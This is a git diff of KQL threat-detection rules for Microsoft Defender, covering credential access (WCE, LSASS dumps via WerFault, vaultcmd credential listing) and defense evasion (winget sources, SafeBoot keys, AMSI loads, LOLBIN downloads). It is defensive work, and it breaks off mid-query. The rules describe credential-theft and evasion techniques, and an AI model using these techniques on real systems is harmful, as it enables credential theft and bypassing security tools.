b/KQL/rules/Credential Access/wce_wceaux_dll_access.kql index a0776d36..8983af2a 100644 --- a/KQL/rules/Credential Access/wce_wceaux_dll_access.kql +++ b/KQL/rules/Credential Access/wce_wceaux_dll_access.kql @@ -1,10 +1,10 @@ -// Title: WCE wceaux.dll Access -// Author: Thomas Patzke -// Date: 2017-06-14 -// Level: critical -// Description: Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003, attack.s0005 - -DeviceRegistryEvents +// Title: WCE wceaux.dll Access +// Author: Thomas Patzke +// Date: 2017-06-14 +// Level: critical +// Description: Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003, attack.s0005 + +DeviceRegistryEvents | where RegistryKey endswith "\\wceaux.dll" \ No newline at end of file diff --git a/KQL/rules/Credential Access/werfault_lsass_process_memory_dump.kql b/KQL/rules/Credential Access/werfault_lsass_process_memory_dump.kql index 00e03537..d8b77bc4 100644 --- a/KQL/rules/Credential Access/werfault_lsass_process_memory_dump.kql +++ b/KQL/rules/Credential Access/werfault_lsass_process_memory_dump.kql @@ -1,10 +1,10 @@ -// Title: WerFault LSASS Process Memory Dump -// Author: Florian Roth (Nextron Systems) -// Date: 2022-06-27 -// Level: high -// Description: Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001 - -DeviceFileEvents +// Title: WerFault LSASS Process Memory Dump +// Author: Florian Roth (Nextron Systems) +// Date: 2022-06-27 +// Level: high +// Description: Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 + +DeviceFileEvents | where InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\WerFault.exe" and (FolderPath contains "\\lsass" or FolderPath contains "lsass.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/windows_credential_editor_registry.kql b/KQL/rules/Credential Access/windows_credential_editor_registry.kql index 394f6e39..40b58969 100644 --- a/KQL/rules/Credential Access/windows_credential_editor_registry.kql +++ b/KQL/rules/Credential Access/windows_credential_editor_registry.kql @@ -1,10 +1,10 @@ -// Title: Windows Credential Editor Registry -// Author: Florian Roth (Nextron Systems) -// Date: 2019-12-31 -// Level: critical -// Description: Detects the use of Windows Credential Editor (WCE) -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001, attack.s0005 - -DeviceRegistryEvents +// Title: Windows Credential Editor Registry +// Author: Florian Roth (Nextron Systems) +// Date: 2019-12-31 +// Level: critical +// Description: Detects the use of Windows Credential Editor (WCE) +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001, attack.s0005 + +DeviceRegistryEvents | where RegistryKey contains "Services\\WCESERVICE\\Start" \ No newline at end of file diff --git a/KQL/rules/Credential Access/windows_credential_manager_access_via_vaultcmd.kql b/KQL/rules/Credential Access/windows_credential_manager_access_via_vaultcmd.kql index 86a64afd..9c0ad9c7 100644 --- a/KQL/rules/Credential Access/windows_credential_manager_access_via_vaultcmd.kql +++ b/KQL/rules/Credential Access/windows_credential_manager_access_via_vaultcmd.kql @@ -1,10 +1,10 @@ -// Title: Windows Credential Manager Access via VaultCmd -// Author: frack113 -// Date: 2022-04-08 -// Level: medium -// Description: List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1555.004 - -DeviceProcessEvents +// Title: Windows Credential Manager Access via VaultCmd +// Author: frack113 +// Date: 2022-04-08 +// Level: medium +// Description: List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555.004 + +DeviceProcessEvents | where ProcessCommandLine contains "/listcreds:" and (FolderPath endswith "\\VaultCmd.exe" or ProcessVersionInfoOriginalFileName =~ "VAULTCMD.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql b/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql index a4241782..c0db6966 100644 --- a/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql +++ b/KQL/rules/Defense Evasion/_rdp_file_created_by_uncommon_application.kql @@ -1,10 +1,10 @@ -// Title: .RDP File Created By Uncommon Application -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-18 -// Level: high -// Description: Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceFileEvents +// Title: .RDP File Created By Uncommon Application +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-18 +// Level: high +// Description: Detects creation of a file with an ".rdp" extension by an application that doesn't commonly create such files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\brave.exe" or InitiatingProcessFolderPath endswith "\\CCleaner Browser\\Application\\CCleanerBrowser.exe" or InitiatingProcessFolderPath endswith "\\chromium.exe" or InitiatingProcessFolderPath endswith "\\firefox.exe" or InitiatingProcessFolderPath endswith "\\Google\\Chrome\\Application\\chrome.exe" or InitiatingProcessFolderPath endswith "\\iexplore.exe" or InitiatingProcessFolderPath endswith "\\microsoftedge.exe" or InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\Opera.exe" or InitiatingProcessFolderPath endswith "\\Vivaldi.exe" or InitiatingProcessFolderPath endswith "\\Whale.exe" or InitiatingProcessFolderPath endswith "\\olk.exe" or InitiatingProcessFolderPath endswith "\\Outlook.exe" or InitiatingProcessFolderPath endswith "\\RuntimeBroker.exe" or InitiatingProcessFolderPath endswith "\\Thunderbird.exe" or InitiatingProcessFolderPath endswith "\\Discord.exe" or InitiatingProcessFolderPath endswith "\\Keybase.exe" or InitiatingProcessFolderPath endswith "\\msteams.exe" or InitiatingProcessFolderPath endswith "\\Slack.exe" or InitiatingProcessFolderPath endswith "\\teams.exe") and FolderPath endswith ".rdp" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/abused_debug_privilege_by_arbitrary_parent_processes.kql b/KQL/rules/Defense Evasion/abused_debug_privilege_by_arbitrary_parent_processes.kql index ab1041ea..b20ff3c4 100644 --- a/KQL/rules/Defense Evasion/abused_debug_privilege_by_arbitrary_parent_processes.kql +++ b/KQL/rules/Defense Evasion/abused_debug_privilege_by_arbitrary_parent_processes.kql @@ -1,10 +1,10 @@ -// Title: Abused Debug Privilege by Arbitrary Parent Processes -// Author: Semanur Guneysu @semanurtg, oscd.community -// Date: 2020-10-28 -// Level: high -// Description: Detection of unusual child processes by different system processes -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548 - -DeviceProcessEvents +// Title: Abused Debug Privilege by Arbitrary Parent Processes +// Author: Semanur Guneysu @semanurtg, oscd.community +// Date: 2020-10-28 +// Level: high +// Description: Detection of unusual child processes by different system processes +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548 + +DeviceProcessEvents | where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "Cmd.Exe"))) and ((InitiatingProcessFolderPath endswith "\\winlogon.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI"))) and (not((ProcessCommandLine contains " route " and ProcessCommandLine contains " ADD "))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/abusing_print_executable.kql b/KQL/rules/Defense Evasion/abusing_print_executable.kql index c16b9ebe..c6fb01db 100644 --- a/KQL/rules/Defense Evasion/abusing_print_executable.kql +++ b/KQL/rules/Defense Evasion/abusing_print_executable.kql @@ -1,10 +1,10 @@ -// Title: Abusing Print Executable -// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative -// Date: 2020-10-05 -// Level: medium -// Description: Attackers can use print.exe for remote file copy -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: Abusing Print Executable +// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative +// Date: 2020-10-05 +// Level: medium +// Description: Attackers can use print.exe for remote file copy +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where ((ProcessCommandLine contains "/D" and ProcessCommandLine contains ".exe") and ProcessCommandLine startswith "print" and FolderPath endswith "\\print.exe") and (not(ProcessCommandLine contains "print.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql b/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql index 247df255..e6f05bb3 100644 --- a/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql +++ b/KQL/rules/Defense Evasion/add_insecure_download_source_to_winget.kql @@ -1,13 +1,13 @@ -// Title: Add Insecure Download Source To Winget -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-17 -// Level: high -// Description: Detects usage of winget to add a new insecure (http) download source. -// Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1059 -// False Positives: -// - False positives might occur if the users are unaware of such control checks - -DeviceProcessEvents +// Title: Add Insecure Download Source To Winget +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-17 +// Level: high +// Description: Detects usage of winget to add a new insecure (http) download source. +// Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059 +// False Positives: +// - False positives might occur if the users are unaware of such control checks + +DeviceProcessEvents | where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add " and ProcessCommandLine contains "http://") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/add_new_download_source_to_winget.kql b/KQL/rules/Defense Evasion/add_new_download_source_to_winget.kql index ee5872f8..e2f2f08a 100644 --- a/KQL/rules/Defense Evasion/add_new_download_source_to_winget.kql +++ b/KQL/rules/Defense Evasion/add_new_download_source_to_winget.kql @@ -1,12 +1,12 @@ -// Title: Add New Download Source To Winget -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-17 -// Level: medium -// Description: Detects usage of winget to add new additional download sources -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1059 -// False Positives: -// - False positive are expected with legitimate sources - -DeviceProcessEvents +// Title: Add New Download Source To Winget +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-17 +// Level: medium +// Description: Detects usage of winget to add new additional download sources +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059 +// False Positives: +// - False positive are expected with legitimate sources + +DeviceProcessEvents | where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/add_potential_suspicious_new_download_source_to_winget.kql b/KQL/rules/Defense Evasion/add_potential_suspicious_new_download_source_to_winget.kql index a18d27f0..aab102c7 100644 --- a/KQL/rules/Defense Evasion/add_potential_suspicious_new_download_source_to_winget.kql +++ b/KQL/rules/Defense Evasion/add_potential_suspicious_new_download_source_to_winget.kql @@ -1,10 +1,10 @@ -// Title: Add Potential Suspicious New Download Source To Winget -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-04-17 -// Level: medium -// Description: Detects usage of winget to add new potentially suspicious download sources -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1059 - -DeviceProcessEvents +// Title: Add Potential Suspicious New Download Source To Winget +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-04-17 +// Level: medium +// Description: Detects usage of winget to add new potentially suspicious download sources +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059 + +DeviceProcessEvents | where (ProcessCommandLine contains "source " and ProcessCommandLine contains "add ") and (FolderPath endswith "\\winget.exe" or ProcessVersionInfoOriginalFileName =~ "winget.exe") and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/add_safeboot_keys_via_reg_utility.kql b/KQL/rules/Defense Evasion/add_safeboot_keys_via_reg_utility.kql index 548ac8af..dcc7fd44 100644 --- a/KQL/rules/Defense Evasion/add_safeboot_keys_via_reg_utility.kql +++ b/KQL/rules/Defense Evasion/add_safeboot_keys_via_reg_utility.kql @@ -1,12 +1,12 @@ -// Title: Add SafeBoot Keys Via Reg Utility -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-02 -// Level: high -// Description: Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Add SafeBoot Keys Via Reg Utility +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-02 +// Level: high +// Description: Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains " copy " or ProcessCommandLine contains " add ") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/addinutil_exe_execution_from_uncommon_directory.kql b/KQL/rules/Defense Evasion/addinutil_exe_execution_from_uncommon_directory.kql index 1c181326..53dbd2bb 100644 --- a/KQL/rules/Defense Evasion/addinutil_exe_execution_from_uncommon_directory.kql +++ b/KQL/rules/Defense Evasion/addinutil_exe_execution_from_uncommon_directory.kql @@ -1,10 +1,10 @@ -// Title: AddinUtil.EXE Execution From Uncommon Directory -// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) -// Date: 2023-09-18 -// Level: medium -// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: AddinUtil.EXE Execution From Uncommon Directory +// Author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) +// Date: 2023-09-18 +// Level: medium +// Description: Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where (FolderPath endswith "\\addinutil.exe" or ProcessVersionInfoOriginalFileName =~ "AddInUtil.exe") and (not((FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\" or FolderPath contains ":\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/ads_zone_identifier_deleted_by_uncommon_application.kql b/KQL/rules/Defense Evasion/ads_zone_identifier_deleted_by_uncommon_application.kql index d0c05759..c81b7387 100644 --- a/KQL/rules/Defense Evasion/ads_zone_identifier_deleted_by_uncommon_application.kql +++ b/KQL/rules/Defense Evasion/ads_zone_identifier_deleted_by_uncommon_application.kql @@ -1,12 +1,12 @@ -// Title: ADS Zone.Identifier Deleted By Uncommon Application -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-09-04 -// Level: medium -// Description: Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.004 -// False Positives: -// - Other third party applications not listed. - -DeviceFileEvents +// Title: ADS Zone.Identifier Deleted By Uncommon Application +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-04 +// Level: medium +// Description: Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 +// False Positives: +// - Other third party applications not listed. + +DeviceFileEvents | where FolderPath endswith ":Zone.Identifier" and (not((InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\explorer.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/agentexecutor_powershell_execution.kql b/KQL/rules/Defense Evasion/agentexecutor_powershell_execution.kql index 408b1e6b..1c055f70 100644 --- a/KQL/rules/Defense Evasion/agentexecutor_powershell_execution.kql +++ b/KQL/rules/Defense Evasion/agentexecutor_powershell_execution.kql @@ -1,12 +1,12 @@ -// Title: AgentExecutor PowerShell Execution -// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards -// Date: 2022-12-24 -// Level: medium -// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate use via Intune management. You exclude script paths and names to reduce FP rate - -DeviceProcessEvents +// Title: AgentExecutor PowerShell Execution +// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards +// Date: 2022-12-24 +// Level: medium +// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate use via Intune management. You exclude script paths and names to reduce FP rate + +DeviceProcessEvents | where ((ProcessCommandLine contains " -powershell" or ProcessCommandLine contains " -remediationScript") and (FolderPath =~ "\\AgentExecutor.exe" or ProcessVersionInfoOriginalFileName =~ "AgentExecutor.exe")) and (not(InitiatingProcessFolderPath endswith "\\Microsoft.Management.Services.IntuneWindowsAgent.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/always_install_elevated_msi_spawned_cmd_and_powershell.kql b/KQL/rules/Defense Evasion/always_install_elevated_msi_spawned_cmd_and_powershell.kql index 69e25b00..3689f997 100644 --- a/KQL/rules/Defense Evasion/always_install_elevated_msi_spawned_cmd_and_powershell.kql +++ b/KQL/rules/Defense Evasion/always_install_elevated_msi_spawned_cmd_and_powershell.kql @@ -1,10 +1,10 @@ -// Title: Always Install Elevated MSI Spawned Cmd And Powershell -// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community -// Date: 2020-10-13 -// Level: medium -// Description: Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceProcessEvents +// Title: Always Install Elevated MSI Spawned Cmd And Powershell +// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community +// Date: 2020-10-13 +// Level: medium +// Description: Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents | where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and ((InitiatingProcessFolderPath contains "\\Windows\\Installer\\" and InitiatingProcessFolderPath contains "msi") and InitiatingProcessFolderPath endswith "tmp") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/always_install_elevated_windows_installer.kql b/KQL/rules/Defense Evasion/always_install_elevated_windows_installer.kql index d620caf0..8501908f 100644 --- a/KQL/rules/Defense Evasion/always_install_elevated_windows_installer.kql +++ b/KQL/rules/Defense Evasion/always_install_elevated_windows_installer.kql @@ -1,14 +1,14 @@ -// Title: Always Install Elevated Windows Installer -// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community -// Date: 2020-10-13 -// Level: medium -// Description: Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 -// False Positives: -// - System administrator usage -// - Anti virus products -// - WindowsApps located in "C:\Program Files\WindowsApps\" - -DeviceProcessEvents +// Title: Always Install Elevated Windows Installer +// Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community +// Date: 2020-10-13 +// Level: medium +// Description: Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 +// False Positives: +// - System administrator usage +// - Anti virus products +// - WindowsApps located in "C:\Program Files\WindowsApps\" + +DeviceProcessEvents | where (((FolderPath contains "\\Windows\\Installer\\" and FolderPath contains "msi") and FolderPath endswith "tmp") or (FolderPath endswith "\\msiexec.exe" and (ProcessIntegrityLevel in~ ("System", "S-1-16-16384")))) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files\\Avast Software\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avast Software\\") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Avira\\" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\Google\\Update\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Google\\Update\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\services.exe" or (ProcessCommandLine endswith "\\system32\\msiexec.exe /V" or InitiatingProcessCommandLine endswith "\\system32\\msiexec.exe /V") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Sophos\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/amsi_dll_loaded_via_lolbin_process.kql b/KQL/rules/Defense Evasion/amsi_dll_loaded_via_lolbin_process.kql index e1bcca0c..6a46db3a 100644 --- a/KQL/rules/Defense Evasion/amsi_dll_loaded_via_lolbin_process.kql +++ b/KQL/rules/Defense Evasion/amsi_dll_loaded_via_lolbin_process.kql @@ -1,10 +1,10 @@ -// Title: Amsi.DLL Loaded Via LOLBIN Process -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-01 -// Level: medium -// Description: Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceImageLoadEvents +// Title: Amsi.DLL Loaded Via LOLBIN Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-01 +// Level: medium +// Description: Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceImageLoadEvents | where FolderPath endswith "\\amsi.dll" and (InitiatingProcessFolderPath endswith "\\ExtExport.exe" or InitiatingProcessFolderPath endswith "\\odbcconf.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql b/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql index f0cb21a5..7489d25a 100644 --- a/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql +++ b/KQL/rules/Defense Evasion/antivirus_filter_driver_disallowed_on_dev_drive_registry.kql @@ -1,12 +1,12 @@ -// Title: Antivirus Filter Driver Disallowed On Dev Drive - Registry -// Author: @kostastsale, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-11-05 -// Level: high -// Description: Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive". -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Antivirus Filter Driver Disallowed On Dev Drive - Registry +// Author: @kostastsale, Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-11-05 +// Level: high +// Description: Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive". +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\FilterManager\\FltmgrDevDriveAllowAntivirusFilter" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql b/KQL/rules/Defense Evasion/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql index 5492f416..e5e3794a 100644 --- a/KQL/rules/Defense Evasion/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql +++ b/KQL/rules/Defense Evasion/arbitrary_dll_or_csproj_code_execution_via_dotnet_exe.kql @@ -1,12 +1,12 @@ -// Title: Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE -// Author: Beyu Denis, oscd.community -// Date: 2020-10-18 -// Level: medium -// Description: Detects execution of arbitrary DLLs or unsigned code via a ".csproj" files via Dotnet.EXE. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate administrator usage - -DeviceProcessEvents +// Title: Arbitrary DLL or Csproj Code Execution Via Dotnet.EXE +// Author: Beyu Denis, oscd.community +// Date: 2020-10-18 +// Level: medium +// Description: Detects execution of arbitrary DLLs or unsigned code via a ".csproj" files via Dotnet.EXE. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate administrator usage + +DeviceProcessEvents | where ((ProcessCommandLine endswith ".csproj" or ProcessCommandLine endswith ".csproj\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".csproj'" or ProcessCommandLine endswith ".dll'") and (FolderPath endswith "\\dotnet.exe" or ProcessVersionInfoOriginalFileName =~ ".NET Host")) and (not(((ProcessCommandLine contains "C:\\ProgramData\\CSScriptNpp\\" and ProcessCommandLine contains "-cscs_path:" and ProcessCommandLine contains "\\cs-script\\cscs.dll") and (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Notepad++\\notepad++.exe", "C:\\Program Files\\Notepad++\\notepad++.exe"))))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/arbitrary_file_download_via_imewdbld_exe.kql b/KQL/rules/Defense Evasion/arbitrary_file_download_via_imewdbld_exe.kql index 7ad1a4e9..9f47fb3a 100644 --- a/KQL/rules/Defense Evasion/arbitrary_file_download_via_imewdbld_exe.kql +++ b/KQL/rules/Defense Evasion/arbitrary_file_download_via_imewdbld_exe.kql @@ -1,10 +1,10 @@ -// Title: Arbitrary File Download Via IMEWDBLD.EXE -// Author: Swachchhanda Shrawan Poudel -// Date: 2023-11-09 -// Level: high -// Description: Detects usage of "IMEWDBLD.exe" to download arbitrary files -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1218 - -DeviceProcessEvents +// Title: Arbitrary File Download Via IMEWDBLD.EXE +// Author: Swachchhanda Shrawan Poudel +// Date: 2023-11-09 +// Level: high +// Description: Detects usage of "IMEWDBLD.exe" to download arbitrary files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 + +DeviceProcessEvents | where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\IMEWDBLD.exe" or 